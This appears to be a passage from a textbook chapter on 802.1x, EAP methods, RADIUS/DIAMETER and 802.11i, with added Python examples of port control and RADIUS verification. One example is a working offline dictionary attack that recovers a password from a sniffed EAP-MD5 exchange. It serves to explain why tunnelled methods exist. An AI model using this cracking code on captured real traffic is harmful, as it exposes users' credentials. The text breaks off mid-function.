IEEE 802.1x initially starts the communications by an attempt to connect with an authenticator (i.e., an 802.16 or 802.11 access point [AP]) to authenticate an unauthenticated supplicant. The AP responds by enabling a port for passing only EAP packets between the clients and the authentication server, which is usually located on the wired side of the AP. The AP blocks all other traffic (i.e., HTTP and dynamic host configuration protocol [DHCP] packets) until the AP (authenticator) is able to verify the client's identity using an authentication server (e.g., DIAMETER or RADIUS). Once authenticated, the AP opens the client's port for the rest of the traffic types.

To better understand how 802.1x operates, the interactions mentioned in Table 1a usually happen between various 802.1x elements.

Figure 1. 802.1x authentication components (Adapted from Kwan, 2003)

Figure 2. Different layers of 802.1x (Adapted from Leira, 2005)

As shown in Figure 1, EAP is an important component of an 802.1x-based infrastructure. EAP improves the authentication scheme provided by the point-to-point protocol (PPP) (RFC 1661). EAP provides PPP with a generalized framework for


Table 1a. A summary of EAP messages in a supplicant-authenticator-authentication server scenario

Step   Supplicant                                AP (Access Point) Authenticator            Authentication Server
1.     Sends EAP-start message                   Receives the message
2.                                               Replies with an EAP-request ID
3.     EAP-response with ID                                                                 Verifies the client's identity using digital certificates, etc.
4.                                               Receives Accept/Reject message             Sends Accept/Reject to the AP
5.     Receives Accept/Reject note               Sends Accept/Reject notification
6.     If accepted, port is open and             AP forwards the messages to the
       messages are accepted                     Authentication Server
7.     If rejected, the end

various types of authentication schemes (Chen & Wang, 2005). The 802.1x standard includes a definition of EAP encapsulation for Ethernet packages used over LANs, which is called EAP over LAN (EAPOL). Figure 2 (Leira, 2005) shows the various layers of selective authentication and network type 802.1x.

There are three main components found in 802.1X-based systems:

• Supplicant, which is the client/user
• Authenticator, which is the mediator between the client and the Authentication Server
• Authentication Server, which determines if the client (supplicant) has the correct information for authentication. This could be a RADIUS or a DIAMETER server

Figure 3. The supplicant-authenticator-authentication server relationship

In most cases, both the supplicant and the authentication server have relatively more processing capabilities than the authenticator. The authenticator is mostly responsible for forwarding, therefore it requires less power as compared to the other two components. An AP can serve well in the role of an authenticator, which makes the system well suited for wireless networks.

Figure 3, which has more details compared to Table 1a, shows how the communication between the supplicant, authenticator, and the authentication server works. Initially the authenticator blocks all traffic except for the EAPOL-based traffic. The rest of the communication process is similar to that of Table 1a. As shown in Figure 3, the EAP scheme operates in the following fashion (Piscitello, 2005) (see Box 1).

In a true end-to-end secure wireless network, it is not only crucial that the authenticator and authentication server ensure the user's legitimacy, but also the supplicant has to be confident that the authentication server and the authenticator are legitimate and not spoofing devices who try to


Box 1.

#     Process taking place                                                  Message transmitted / state
1.    Supplicant tries to connect to the authenticator (AP)                 802.1x Associate Request
2.    Authenticator detects supplicant and enables client's port            Port set to Unauthorized
3.    Authenticator returns a response to supplicant and waits              802.1x Associate Response
4.    Supplicant transmits a message to authenticator                       EAP-START
5.    Authenticator replies a message to supplicant, asks for identity      EAP-REQUEST IDENTITY
6.    Supplicant provides its identity to authenticator                     EAP-RESPONSE
7.    Authenticator forwards EAP-RESPONSE to authentication server          FORWARD EAP-RESPONSE
8.    Authentication server authenticates clients                           Authenticates via EAP-TLS, LEAP
9.    If accepted by authentication server, signals to authenticator        ACCEPT
10.   If rejected by authentication server, signals to authenticator        REJECT
11.   If authenticator receives acceptance, responds to supplicant;         EAP SUCCESS;
      supplicant can use the wireless LAN                                   Port set to AUTHORIZED
12.   If authenticator receives rejection, responds to supplicant;          EAP FAILURE;
      supplicant remains blocked from the wireless LAN                      Port state no change
13.   If client succeeded, authenticator passes global key to client        Global Key Passed
14.   When client terminates session, it logs off                           EAP LOGOFF

obtain the user name and password from the user. This scenario can be prevented by using a mutual authentication scheme where the authentication server and the authenticators also have to be authenticated by the supplicant. Examples of such mutual authentication schemes are used in TLS, tunneled TLS (TTLS), LEAP, and PEAP.

IEEE 802.1x also provides a framework to reduce or eliminate the danger of session hijacking and man-in-the-middle (MITM) attacks, however it requires that the right type of authentication (mutual authentication) be used. Secure authentication does not yet imply secure communication. A strong encryption method is required to ensure data confidentiality. EAP enables the usage of different types of encryption with dynamic key distribution techniques.

RADIUS AND DIAMETER

Both RADIUS (Hill, 2001) and DIAMETER (Calhoun, Loughney, Guttman, Zorn, & Arkko, 2003) are authentication, authorization, and accounting (AAA) protocols for applications and mechanisms used in network access or Internet protocol (IP) mobility. They are intended to work in both local and roaming situations.

Many applications running through ISPs using modems, DSL, cable, or wireless connections require some sort of user name/password for access permission. This information is usually transmitted to a RADIUS server, over a network access server (NAS) device, using the point-to-point protocol (PPP) and the RADIUS protocol. The RADIUS server verifies that the information is correct. This is done using authentication schemes such as the password authentication protocol (PAP), the challenge handshake authentication protocol (CHAP), or EAP. If authentication and authorization are accepted, then the server will authorize access to the ISP network and select an IP address and other access control parameters (L2TP parameters). The RADIUS server is also notified of any session start-stop for related accounting, billing, and other statistical issues. RADIUS is an extensible



protocol in which most RADIUS vendors have their own hardware and software implementations.

The DIAMETER protocol is proposed to replace RADIUS and it is designed to be backward compatible in most cases. The main differences between the DIAMETER and RADIUS protocols are listed in Box 2. The message format and the authentication flows in DIAMETER EAP applications are given in Figures 4 and 5.

Applying RADIUS to Wireless LANs

In wireless-based networks that use 802.1x port access control, the wireless station is a remote user and the wireless AP behaves as the network access server (NAS) (Phifer, L., 2003). The IEEE 802.11-based protocols (a, b, or g) are used to associate the wireless stations to the wireless APs.

Once the client is associated, it transmits an EAP-Start message to the AP. The AP sends a request to the wireless station, asking for its identity, and relays the message to an AAA server using a RADIUS-based access-request user name message.

As expected, through the AP, the wireless station and the AAA server establish the authentication process by exchanging RADIUS access-challenge and access-request messages. According to the specific EAP type, an encrypted TLS tunnel could be used to convey the messages inside of the tunnel.

If an access-accept message is sent by the AAA server, the wireless station and the AP establish a handshake. This generates session keys that are used by either temporal key integrity protocol (TKIP) or wired equivalence privacy (WEP) to encrypt data. At this point, the port is unblocked by the AP and the wireless station is able to send and receive data to and from the attached LAN. If an access-reject message is sent by the AAA server, the client will be disassociated by the AP.
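The port-control behaviour described in Box 1 and in the paragraphs above, modelled as an added example (not the chapter's own code): the authenticator keeps the 802.1x port Unauthorized and drops every non-EAPOL frame until the authentication server returns ACCEPT, and an EAPOL-Logoff closes the port again. The identities and secrets are constructed sample values, and the server runs the EAP MD5-Challenge method of RFC 3748 (the CHAP computation of RFC 1994) in place of the EAP-TLS/LEAP named in Box 1; that substitution is an assumption of the example.

```python
"""Added example: a model of the 802.1x port control of Box 1 (not the chapter's code).

Assumptions: the authentication server runs the EAP MD5-Challenge method of
RFC 3748 section 5.4 (response = MD5(identifier || secret || challenge), the
CHAP computation of RFC 1994) instead of the EAP-TLS/LEAP named in Box 1; the
identities and secrets below are constructed sample values.
"""
import hashlib
import hmac
import os

UNAUTHORIZED, AUTHORIZED = "Unauthorized", "Authorized"


class AuthenticationServer:
    """Holds the credential database and runs the EAP method (the RADIUS/DIAMETER role)."""

    def __init__(self, users):
        self.users = dict(users)     # identity -> secret (constructed sample data)
        self.pending = {}            # identity -> (eap_identifier, challenge)

    def challenge(self, identity):
        """Issue a fresh random challenge; unknown identities get one too, so the
        server does not reveal which identities exist."""
        eap_id, chal = 1, os.urandom(16)
        self.pending[identity] = (eap_id, chal)
        return {"type": "EAP-Request/MD5-Challenge", "id": eap_id, "challenge": chal}

    def verify(self, identity, value):
        """ACCEPT only if value == MD5(id || secret || challenge) for a pending challenge."""
        secret = self.users.get(identity)
        pending = self.pending.pop(identity, None)       # one response per challenge
        if secret is None or pending is None:
            return "REJECT"
        eap_id, chal = pending
        expected = hashlib.md5(bytes([eap_id]) + secret + chal).digest()
        return "ACCEPT" if hmac.compare_digest(value, expected) else "REJECT"


class Authenticator:
    """The AP: owns the port state, relays EAP, never learns the secret."""

    def __init__(self, server):
        self.server = server
        self.port = UNAUTHORIZED

    def receive(self, frame):
        kind = frame["type"]
        if kind == "EAPOL-Start":                               # Box 1 steps 4-5
            return {"type": "EAP-Request/Identity"}
        if kind == "EAP-Response/Identity":                     # steps 6-7: forwarded to the server
            return self.server.challenge(frame["identity"])
        if kind == "EAP-Response/MD5-Challenge":                # steps 8-12
            if self.server.verify(frame["identity"], frame["value"]) == "ACCEPT":
                self.port = AUTHORIZED
                return {"type": "EAP-Success"}
            return {"type": "EAP-Failure"}                      # port state unchanged
        if kind == "EAPOL-Logoff":                              # step 14
            self.port = UNAUTHORIZED
            return {"type": "LOGGED-OFF"}
        # Anything else (DHCP, HTTP, ...) is dropped while the port is Unauthorized.
        return {"type": "FORWARDED" if self.port == AUTHORIZED else "DROPPED"}


class Supplicant:
    def __init__(self, identity, secret):
        self.identity, self.secret = identity, secret

    def answer(self, request):
        """Compute the MD5-Challenge response for the server's challenge."""
        value = hashlib.md5(bytes([request["id"]]) + self.secret + request["challenge"]).digest()
        return {"type": "EAP-Response/MD5-Challenge", "identity": self.identity, "value": value}


def run_session(ap, supplicant):
    """Drive one Box 1 session and return the frame types the supplicant saw."""
    seen = [ap.receive({"type": "DHCP"})["type"]]              # blocked before authentication
    req = ap.receive({"type": "EAPOL-Start"})
    seen.append(req["type"])
    chal = ap.receive({"type": "EAP-Response/Identity", "identity": supplicant.identity})
    seen.append(chal["type"])
    seen.append(ap.receive(supplicant.answer(chal))["type"])   # EAP-Success or EAP-Failure
    seen.append(ap.receive({"type": "DHCP"})["type"])          # data frame after the verdict
    return seen


if __name__ == "__main__":
    server = AuthenticationServer({"alice@example.org": b"correct-secret"})
    ap = Authenticator(server)
    print(run_session(ap, Supplicant("alice@example.org", b"correct-secret")), ap.port)
    ap.receive({"type": "EAPOL-Logoff"})
    print(run_session(ap, Supplicant("alice@example.org", b"wrong-secret")), ap.port)
```

The server consumes each challenge on first use, so a captured response replayed after a logoff is rejected even though the secret has not changed.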

Box 2.

#     DIAMETER uses:                                                    RADIUS uses:
1.    Reliable transport protocol (TCP or stream control                Unreliable transport protocol (UDP)
      transmission protocol [SCTP])
2.    End-to-end transport level security protocols (IPSec or TLS)      End-users, such as, CHAP and PAP
3.    Transition support for RADIUS                                     No direct compatibility with DIAMETER
4.    Large address space for AVPs (attribute value pairs) – 32 bits    Smaller address space – 8 bits
5.    A peer-to-peer protocol scheme; server-initiated messages         Client-server protocol scheme; request/response
      support                                                           scheme only
6.    Both stateful and stateless models                                Only a stateless model
7.    DNS (dynamic name system), SRV (generalized service location),    Static discovery agents
      and NAPTR (naming authority pointer), for dynamic discovery
      of peers
8.    Capability negotiation (version, applications, etc.)              No such built-in capability
9.    Application layer acknowledgements and built-in failover          No such failover mechanism
      (device-watchdog request/device-watchdog answer [DWR/DWA])
10.   Error notification                                                No such notification
11.   Better roaming support                                            Average support for fixed and roaming users
12.   Better extended command and attributes                            Average command and attributes
13.   Better Mobile-IP support and stronger security                    Average security options
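The RADIUS leg of the wireless exchange described in the preceding section, as an added example that is not the chapter's code: the AAA server's Access-Accept carries the session parameters the AP applies (Session-Timeout, Tunnel-Type=VLAN, Tunnel-Private-Group-ID), and the AP verifies the Response Authenticator of RFC 2865 before trusting them. The attribute numbers are the IANA-registered values of RFC 2865 and RFC 2868; the shared secret, packet identifier, request authenticator and VLAN id are constructed sample values.

```python
"""Added example (not the chapter's code): a RADIUS Access-Accept carrying session
parameters to the AP, and the AP's check of the RFC 2865 Response Authenticator.
Attribute numbers are the IANA values of RFC 2865/2868; the secret, identifier,
request authenticator and VLAN id are constructed sample values."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
SESSION_TIMEOUT, TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE, TUNNEL_PRIVATE_GROUP_ID = 27, 64, 65, 81
TUNNEL_TYPE_VLAN, TUNNEL_MEDIUM_IEEE802 = 13, 6
HEADER_LEN = 20   # Code(1) Identifier(1) Length(2) Authenticator(16)

def avp(attr_type, value):
    """Type(1) Length(1) Value; the length counts the two header octets."""
    if len(value) > 253:
        raise ValueError("attribute value too long")
    return struct.pack("!BB", attr_type, 2 + len(value)) + value

def tagged_int(attr_type, tag, value):
    """RFC 2868 tagged integer: Tag(1) followed by a 3-octet value."""
    return avp(attr_type, bytes([tag]) + value.to_bytes(3, "big"))

def tagged_string(attr_type, tag, text):
    """RFC 2868 tagged string: Tag(1) followed by the string."""
    return avp(attr_type, bytes([tag]) + text.encode())

def build_response(code, identifier, request_authenticator, attributes, secret):
    """Server side: Response Authenticator = MD5(Code+ID+Length+RequestAuth+Attributes+Secret)."""
    header = struct.pack("!BBH", code, identifier, HEADER_LEN + len(attributes))
    response_auth = hashlib.md5(header + request_authenticator + attributes + secret).digest()
    return header + response_auth + attributes

def verify_response(packet, request_authenticator, secret):
    """NAS/AP side: recompute the authenticator; a mismatch means a forged or altered reply."""
    if len(packet) < HEADER_LEN:
        return False
    header, received, attributes = packet[:4], packet[4:HEADER_LEN], packet[HEADER_LEN:]
    if struct.unpack("!BBH", header)[2] != len(packet):
        return False
    expected = hashlib.md5(header + request_authenticator + attributes + secret).digest()
    return hmac.compare_digest(received, expected)

def parse_attributes(packet):
    """Walk the attribute TLVs; tagged attributes are decoded as in RFC 2868."""
    out, pos = {}, HEADER_LEN
    while pos < len(packet):
        attr_type, length = packet[pos], packet[pos + 1]
        if length < 2 or pos + length > len(packet):
            raise ValueError("malformed attribute")
        value = packet[pos + 2:pos + length]
        if attr_type == SESSION_TIMEOUT:
            out["Session-Timeout"] = int.from_bytes(value, "big")
        elif attr_type in (TUNNEL_TYPE, TUNNEL_MEDIUM_TYPE):
            name = "Tunnel-Type" if attr_type == TUNNEL_TYPE else "Tunnel-Medium-Type"
            out[name] = (value[0], int.from_bytes(value[1:], "big"))
        elif attr_type == TUNNEL_PRIVATE_GROUP_ID:
            # A leading octet of 0x00..0x1F is a tag; anything else is part of the string.
            if value and value[0] <= 0x1F:
                out["Tunnel-Private-Group-ID"] = (value[0], value[1:].decode())
            else:
                out["Tunnel-Private-Group-ID"] = (0, value.decode())
        pos += length
    return out

def session_parameters(packet, request_authenticator, secret):
    """What the AP applies: None for a reject or for a packet that fails verification."""
    if not verify_response(packet, request_authenticator, secret) or packet[0] != ACCESS_ACCEPT:
        return None
    attrs = parse_attributes(packet)
    vlan = None
    tag, tunnel_type = attrs.get("Tunnel-Type", (0, 0))
    if tunnel_type == TUNNEL_TYPE_VLAN:
        group_tag, group = attrs.get("Tunnel-Private-Group-ID", (0, None))
        if group_tag == tag:            # the tag binds the Tunnel-* attributes of one tunnel
            vlan = group
    return {"timeout": attrs.get("Session-Timeout"), "vlan": vlan}

def demo(secret=b"shared-secret-1", request_authenticator=None):
    """Server builds the Access-Accept; the AP verifies it and extracts the parameters."""
    request_authenticator = request_authenticator or os.urandom(16)   # taken from the Access-Request
    attributes = (avp(SESSION_TIMEOUT, (3600).to_bytes(4, "big"))
                  + tagged_int(TUNNEL_TYPE, 1, TUNNEL_TYPE_VLAN)
                  + tagged_int(TUNNEL_MEDIUM_TYPE, 1, TUNNEL_MEDIUM_IEEE802)
                  + tagged_string(TUNNEL_PRIVATE_GROUP_ID, 1, "42"))
    accept = build_response(ACCESS_ACCEPT, 7, request_authenticator, attributes, secret)
    return accept, session_parameters(accept, request_authenticator, secret)
```

An AP that skips the authenticator check would apply a VLAN or timeout from any host able to spoof the server's UDP reply, which is why `session_parameters` refuses the packet before it parses a single attribute.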


Figure 4. DIAMETER message format (Adapted from Wu, Chen, Chen, & Fan, 2005)

Figure 5. Authentication flows in DIAMETER EAP applications (Adapted from Wu, Chen, Chen, & Fan, 2005)

At this point, the failed supplicant can try the authentication process again; however, it is prevented by the AP from transmitting data packets. It should be noted that the failed client is still able to listen to the data transmitted across the wireless channel. This raises the importance of encryption techniques for privacy over the air.
The AAA server uses the attribute-value pairs included in the RADIUS messages to deliver session parameters to the wireless station via the AP, such as a session timeout or a VLAN tag (Tunnel-Private-Group-ID=tag, Tunnel-Type=VLAN). The additional information that can be delivered and used depends on the AAA server, the AP, and the wireless station settings.

EAP and Different Authentication Methods

EAP by itself cannot protect the authentication message exchange between the client, authenticator, and authentication server. In order to secure the message exchange, an EAP authentication method is necessary. The commonly used EAP authentication methods include (Kwan, 2003; Phifer, 2003; "What are Your EAP Authentication Options?," 2005):

EAP-MD5 (the MD5-Challenge method, equivalent to CHAP, RFC 1994): The EAP-MD5 protocol lets a RADIUS server authenticate LAN stations through MD5 hash verification of each user's password. For a trusted Ethernet, this is a simple and reasonable choice where there is little risk of an outsider's active attack or sniffing. EAP-MD5, on the other hand, is not suitable for wireless LANs or public Ethernets, since the station identities and password hashes are exposed to easy outside sniffing, and a captured challenge/response pair can be run through a dictionary attack offline. A man-in-the-middle attack or session hijacking could also be an issue. EAP-MD5 protects only the challenge/response exchange itself: each response is an MD5 hash over the identifier, the password, and the server's challenge, which is a keyed hash rather than a digital signature, and it does not protect the identity exchange or any later traffic. EAP-MD5 has light computational weight and therefore good timing performance, and it is fairly easy to implement and configure. EAP-MD5 does not use public key infrastructure (PKI) certificates for validating clients, nor does it provide strong encryption for protecting the authentication messages between the supplicant and the authentication server. EAP-MD5 is most suitable for EAP message exchanges in wired networks where the EAP client is directly connected to the authenticator. In this case, the chances for message interception and eavesdropping are relatively low. Therefore, for wireless 802.1x authentication schemes, stronger and more robust EAP authentication methods should be deployed.

EAP with transport layer security (EAP-TLS): EAP-TLS is specified in RFC 2716 and, along with EAP-TTLS, is the main standards-based option designed for wireless LANs. EAP-TLS mandates a procedure in which the station and the RADIUS server are both required to prove their identities using public key cryptography (i.e., security tokens, smart cards, or digital certificates). This procedure is secured by an encrypted TLS tunnel, which makes EAP-TLS very resilient against dictionary, man-in-the-middle, and other types of attacks. However, the station's identity, which is the name attached to the certificate, can still be sniffed through eavesdropping, because the client certificate is sent before the TLS tunnel is established. EAP-TLS is a very attractive candidate for large enterprises which only use Windows (2000/2003/XP)-based applications with deployed certificates. EAP-TLS provides strong security by requiring both client and authentication server to be authenticated and authorized using PKI certificates (mutual authentication). This works well within 802.1x authentication schemes, as the TLS tunnel between the client and the authentication server protects the EAP messages from sniffing and eavesdropping. The only notable drawback of EAP-TLS is the requirement for PKI certificates on both sides (clients and authentication servers). This complicates roll-out and maintenance procedures and increases the overhead of establishing a secure link, as certificates can be quite large. Figure 6 shows the EAP-TLS message flow.

EAP with tunnelled TLS (EAP-TTLS): EAP-TTLS is an extension of EAP-TLS which provides the benefits of a strong encryption scheme without the complexity of certificates on both sides (client and authentication server). Similar to EAP-TLS, EAP-TTLS supports mutual authentication; however, it only requires the authentication server to be validated to the client using a certificate exchange. EAP-TTLS allows the client to be authenticated by the authentication server through a user name/password process and only requires a certificate for the authentication server. EAP-TTLS simplifies the rollout and maintenance procedures while retaining strong security and a relatively strong authentication scheme. A TLS tunnel is used for protecting the EAP messages and for reusing existing user credential services for 802.1x authentication, such as RADIUS, Active Directory, and LDAP. EAP-TTLS also provides backward compatibility for other authentication protocols, such as PAP, CHAP, MS-CHAP, and MS-CHAP-V2. If the TLS tunnel is not used, or if the client does not validate the server's certificate, EAP-TTLS is not considered secure and the client can be fooled into revealing its credentials to a rogue server. EAP-TTLS is most suitable for infrastructures that require strong authentication without mandating the use of certificates on both sides. Wireless 802.1x authentication schemes usually support EAP-TTLS.

Protected EAP (PEAP): PEAP is an Internet-draft (still not an RFC) which is similar to EAP-TTLS in terms of supporting mutual authentication. PEAP is currently supported by Cisco Systems, RSA Data Security Inc., and Microsoft. PEAP is an authentication protocol alternative to EAP-TTLS, which overcomes EAP weaknesses through:

a. Protecting user credentials
b. Securing EAP negotiation flows
c. Standardizing key exchange flows
d. Supporting fragmentation and reassembly procedures
e. Supporting fast reconnects

PEAP allows the use of other EAP-based authentication methods inside it and secures their transmission through a TLS-encrypted tunnel. PEAP relies on the TLS keying method for key creation and exchange. The PEAP client is authenticated directly with the back-end authentication server. The authenticator acts as a pass-through device, which does not require much processing power or manipulation and needs little understanding of the EAP authentication protocol mechanism. Unlike EAP-TTLS, PEAP does not support inherent username and password authentication against an existing user database (such as LDAP); to support this, each vendor builds its own feature on top of the protocol. PEAP is most suitable for infrastructures which require strong authentication without the use of certificates on both sides, similar to EAP-TTLS. Wireless 802.1x authentication schemes usually support PEAP.

Cisco's lightweight EAP (LEAP): LEAP goes beyond EAP-MD5 in addressing the security issues of wireless networks by delivering the keys used for WLAN encryption and requiring mutual authentication. Mutual authentication reduces the risk of an attacker posing as an AP (MITM attack). However, station identities and passwords remain vulnerable to sniffing and dictionary attacks. LEAP is mostly used when Cisco-based APs and cards are involved. LEAP mandates mutual authentication between the client and the authenticator: the client first has to authenticate itself to the authenticator, and then the authenticator has to authenticate itself to the client. If both authentication procedures succeed, a network connection is granted. Unlike EAP-TLS, LEAP is username/password-based and not based on PKI certificates, which simplifies roll-out and maintenance procedures. Being proprietary to Cisco is one of the drawbacks of LEAP, and is the reason it has not been widely adopted by other networking vendors. LEAP is most suitable for wireless scenarios with Cisco APs and LEAP-compliant wireless NIC cards.

EAP-SIM: The EAP method for global system for mobile communications (GSM) subscriber identity module (SIM), or EAP-SIM, is an EAP-based mechanism for authentication and session key distribution that uses the GSM SIM. EAP-SIM is described in RFC 4186.

Tables 1b and 2 show summaries and comparisons between all of the EAP-based methods mentioned.

Depending on the specific EAP authentication method used, IEEE 802.1x authentication can help to solve the following security issues (Kwan, 2003):

• Dictionary attack: In this type of attack, the attacker obtains the challenge/response message exchange from a password authentication session and uses a brute-force search to find the password. IEEE 802.1x with a tunnelled method solves this type of attack by using TLS-based tunnels to protect the credential exchange between the authenticator and the supplicant.
• Session hijack: In this attack, the attacker is able to sniff the packets passed between the client and the authenticator and to recover the client's identity information. The attacker then pushes the "legitimate" client out of the session through a form of denial-of-service (DoS) attack and impersonates the client to continue the conversation with the authenticator (DoS and session hijacking). IEEE 802.1x can thwart session hijacking through its ability to authenticate securely with dynamic session-based keys.
• Man-in-the-middle: The MITM attack happens in one-way authentication or unbalanced schemes, where the attacker obtains the necessary information from the client and/or the authenticator, inserts itself into the session, and becomes the "middle man." Through IEEE 802.1x's authentication and dynamic session-based keys, the encryption of the data stream between the client and the authenticator can prevent this type of attack.

Table 1b. Comparison between different EAP methods in terms of client/server strength (Adapted from Phifer, 2003)

Figure 6. Message flow of EAP-TLS
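To make the dictionary attack above concrete, the following Python is an added example (not code from the chapter or its references). It builds an EAP-Request/MD5-Challenge and the matching EAP-Response as defined in RFC 3748 (Type 4), where the response value is MD5(Identifier || password || challenge) exactly as in CHAP (RFC 1994), then takes the attacker's side: given only the two packets captured off the air and a wordlist, it recovers the password offline. The password, the challenge, the names and the wordlist are all constructed for the example.

```python
import hashlib
import os

# EAP codes and the MD5-Challenge type from RFC 3748.
EAP_REQUEST, EAP_RESPONSE, EAP_TYPE_MD5 = 1, 2, 4


def _eap_md5_packet(code, identifier, value, name):
    """EAP packet: Code(1) Identifier(1) Length(2) Type(1)=4 Value-Size(1) Value Name."""
    type_data = bytes([EAP_TYPE_MD5, len(value)]) + value + name
    return bytes([code, identifier]) + (4 + len(type_data)).to_bytes(2, "big") + type_data


def eap_md5_request(identifier, challenge, name=b""):
    """Server -> peer: the challenge travels in the clear."""
    return _eap_md5_packet(EAP_REQUEST, identifier, challenge, name)


def md5_challenge_response(identifier, password, challenge):
    """CHAP-style response: MD5(Identifier || secret || challenge). A keyed hash, not a signature."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


def eap_md5_response(identifier, password, challenge, name=b""):
    """Peer -> server: 16-byte MD5 value plus the peer's name, also in the clear."""
    return _eap_md5_packet(EAP_RESPONSE, identifier, md5_challenge_response(identifier, password, challenge), name)


def parse_eap_md5(packet):
    """Return (code, identifier, value, name) from an EAP MD5-Challenge request or response."""
    if len(packet) < 6:
        raise ValueError("packet shorter than the MD5-Challenge header")
    code, identifier = packet[0], packet[1]
    length = int.from_bytes(packet[2:4], "big")
    if length != len(packet) or packet[4] != EAP_TYPE_MD5:
        raise ValueError("not a well-formed EAP MD5-Challenge packet")
    value_size = packet[5]
    if 6 + value_size > length:
        raise ValueError("Value-Size runs past the packet")
    return code, identifier, packet[6:6 + value_size], packet[6 + value_size:length]


def dictionary_attack(sniffed_request, sniffed_response, wordlist):
    """Attacker's side: recover the password from one captured challenge/response pair, or None."""
    req_code, req_id, challenge, _ = parse_eap_md5(sniffed_request)
    resp_code, resp_id, response, _ = parse_eap_md5(sniffed_response)
    if req_code != EAP_REQUEST or resp_code != EAP_RESPONSE or req_id != resp_id:
        raise ValueError("packets are not a matching MD5-Challenge request/response pair")
    for candidate in wordlist:
        # One MD5 per candidate; the attacker never has to talk to the server.
        if md5_challenge_response(resp_id, candidate, challenge) == response:
            return candidate
    return None


def demo():
    """Constructed exchange: the supplicant's real password and the wordlist are assumptions."""
    password = b"Summer2007"
    challenge = os.urandom(16)
    request = eap_md5_request(0x2A, challenge, b"radius.example.net")
    response = eap_md5_response(0x2A, password, challenge, b"alice")
    wordlist = [b"password", b"letmein", b"Winter2006", b"Summer2007", b"qwerty"]
    return password, dictionary_attack(request, response, wordlist)
```

Nothing in the exchange depends on a secret the attacker lacks, and the identity has already been sent in the clear in EAP-Response/Identity, so a passive listener on a WLAN gets everything needed. Running the same method inside an EAP-TTLS or PEAP tunnel denies the attacker the challenge/response pair, which is the whole reason the tunnelled methods exist.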

IEEE 802.11i - WLAN Security Standard Implementation

The IEEE 802.11i standard was designed to provide secure communications in wireless LANs and is part of the IEEE 802.11 specifications. For many years, WEP was used as a WLAN security technology. However, WEP has been proven not to be secure with today's computational power, because of its short (24-bit) initialization vector, which causes key stream reuse that allows the data to be recovered, and the weak-key properties of RC4 as keyed by WEP (to name a few). IEEE 802.11i enhances the encryption, authentication, and key management schemes of WEP. IEEE 802.11i is the basis of the Wi-Fi Alliance's Wi-Fi protected access (WPA) schemes.

WPA in 802.11i

WPA is a subset of IEEE 802.11i, the standard for WLAN security, and consists of the following:

• An authentication mechanism that uses IEEE 802.1x or a pre-shared key scheme.
• An encryption mechanism which uses the temporal key integrity protocol (TKIP), per the IEEE 802.11i definition. TKIP can be software-based and offered by products that support WEP.

WPA2 and 802.11i

WPA2 is the second generation of WPA security introduced by the Wi-Fi Alliance (Lehembre, 2005). It consists of:

• An authentication mechanism that uses IEEE 802.1x or a pre-shared key scheme.
• An encryption mechanism which uses the advanced encryption standard (AES), per the IEEE 802.11i definition.

WPA2 with AES is eligible for FIPS 140-2 compliance (FIPS 140-2 is specified by the United States Government's National Institute of Standards and Technology [NIST] and defines four security levels). WPA2 is a requirement for Wi-Fi compliance from 2006.

Table 2. Comparison among various EAP methods in terms of wireless security strength (Adapted from "What are Your EAP Authentication Options?," 2005)

EAP Method Requirements for Wireless LANs

RFC 4017 (Stanley, Walker, & Aboba, 2005) specifies the requirements for EAP methods used in IEEE 802.11-based systems which use IEEE 802.11i for authentication and authorization. This in turn could be applied to IEEE 802.16 as well. The 802.11i MAC security enhancements make use of both IEEE 802.1x and EAP. Today's deployments of IEEE 802.11 wireless LANs are based on EAP, integrated with several EAP methods, namely EAP-TLS, EAP-TTLS, PEAP, and EAP-SIM, which were discussed before. These methods support authentication credentials including digital certificates, secure tokens, usernames/passwords, and SIM secrets.
IEEE 802.11i specifies the usage of EAP for both authentication and key exchange between the EAP peers and servers. RFC 3748 (Aboba, Blunk, Vollbrecht, Carlson, & Levkowetz, 2004) outlines the EAP usage within IEEE 802.11i, which is subject to threats, given that a WLAN provides ready access to any attacker within range.
The following four components are integral parts of the IEEE 802.11i specifications ("IEEE 802.11i: WLAN Security Standards," 2006):

• Temporal key integrity protocol (TKIP): TKIP is a protocol which uses the RC4 cipher for encryption of data and deals with the confidentiality of data. TKIP improves on the security weaknesses of WEP. It uses a message integrity code, called "Michael," which protects each frame against forgery and tampering. TKIP utilizes a per-packet key mixing function to overcome the weak-key attacks on RC4 as keyed by WEP. TKIP is used in 802.11i during two phases:
° First phase: In the first phase, TKIP is used together with an improved message integrity check (MIC). This is to stop data manipulation.
° Second phase: In the second phase, TKIP and MIC are replaced with the counter mode with cipher block chaining message authentication code protocol (CCMP). CCMP uses the AES encryption scheme.
TKIP offers three advantages over WEP:
 A longer initialization vector (IV), which minimizes the chance of key stream reuse
 Key hashing, which results in a different key being used for each data packet
 A MIC, which ensures that the message is not altered during the communication between sender and receiver
• Counter mode/CBC-MAC protocol (CCMP): CCMP is similar to TKIP in that it deals with the confidentiality of data as well as authentication and integrity. One of the differences between CCMP and TKIP is the fact that CCMP uses AES in counter mode for data confidentiality. The other difference is the usage of a cipher block chaining message authentication code (CBC-MAC) for authentication and integrity. In the architecture of 802.11i, CCMP uses a 128-bit key. CCMP also protects some header fields which are not encrypted, through a mechanism called additional authentication data (AAD). The AAD protection binds the frame to its addresses, which prevents attackers from redirecting or replaying packets to other destinations.
• IEEE 802.1x: IEEE 802.11i uses IEEE 802.1x for port-based access control, which offers an effective framework to authenticate and control user traffic and also offers dynamically varying encryption keys. Through this component (802.1x), 802.11i is tied to EAP.
• EAP encapsulation over LANs (EAPOL): As discussed in Figure 2, the EAP layer sits above EAPOL, which is the framing protocol of IEEE 802.1x and also carries the key exchange. Two main schemes covered by the EAPOL-Key exchanges are defined in IEEE 802.11i: the 4-way handshake and the group key handshake.
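The 4-way handshake named in the last bullet is where the dynamic session keys come from. The following Python is an added example (not code from the chapter or from any 802.11 implementation): it derives the PMK from a WPA pre-shared key with PBKDF2, expands it into the pairwise transient key (KCK, KEK, TK) with the 802.11i PRF over both MAC addresses and both nonces, and computes and verifies the EAPOL-Key MIC that message 2 of the handshake carries (HMAC-SHA1 truncated to 128 bits for the AES key descriptor, HMAC-MD5 for TKIP). The passphrase/SSID pair is the IEEE 802.11i Annex H test vector; the MAC addresses, nonces and EAPOL-Key frame are constructed for the example.

```python
import hashlib
import hmac


def psk_to_pmk(passphrase, ssid):
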